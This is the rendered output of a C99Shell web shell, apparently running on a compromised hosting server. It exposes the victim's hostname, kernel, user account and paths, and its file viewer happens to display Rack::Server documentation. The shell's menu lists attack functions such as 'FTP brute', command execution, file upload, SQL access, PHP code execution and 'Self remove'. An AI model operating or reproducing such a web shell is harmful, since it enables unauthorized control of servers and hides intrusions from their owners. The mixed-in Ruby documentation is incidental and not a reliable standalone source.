!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/opt/alt/ruby18/lib64/ruby/gems/1.8/doc/rack-1.6.1/rdoc/classes/Rack/   drwxr-xr-x
Free 293.41 GB of 429.69 GB (68.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Server.html (11 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Class: Rack::Server
Class Rack::Server
In: lib/rack/server.rb
Parent: Object

Classes and Modules

Class Rack::Server::Options

Attributes

options  [W] 

Public Class methods

Options may include:

  • :app
      a rack application to run (overrides :config)
    
  • :config
      a rackup configuration file path to load (.ru)
    
  • :environment
      this selects the middleware that will be wrapped around
      your application. Default options available are:
        - development: CommonLogger, ShowExceptions, and Lint
        - deployment: CommonLogger
        - none: no extra middleware
      note: when the server is a cgi server, CommonLogger is not included.
    
  • :server
      choose a specific Rack::Handler, e.g. cgi, fcgi, webrick
    
  • :daemonize
      if true, the server will daemonize itself (fork, detach, etc)
    
  • :pid
      path to write a pid file after daemonize
    
  • :Host
      the host address to bind to (used by supporting Rack::Handler)
    
  • :Port
      the port to bind to (used by supporting Rack::Handler)
    
  • :AccessLog
      webrick access log options (or supporting Rack::Handler)
    
  • :debug
      turn on debug output ($DEBUG = true)
    
  • :warn
      turn on warnings ($-w = true)
    
  • :include
      add given paths to $LOAD_PATH
    
  • :require
      require the given libraries
    

Start a new rack server (like running rackup). This will parse ARGV and provide standard ARGV rackup options, defaulting to load ‘config.ru’.

Providing an options hash will prevent ARGV parsing and will not include any default options.

This method can be used to very easily launch a CGI application, for example:

 Rack::Server.start(
   :app => lambda do |e|
     [200, {'Content-Type' => 'text/html'}, ['hello world']]
   end,
   :server => 'cgi'
 )

Further options available here are documented on Rack::Server#initialize

Public Instance methods


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0041 ]--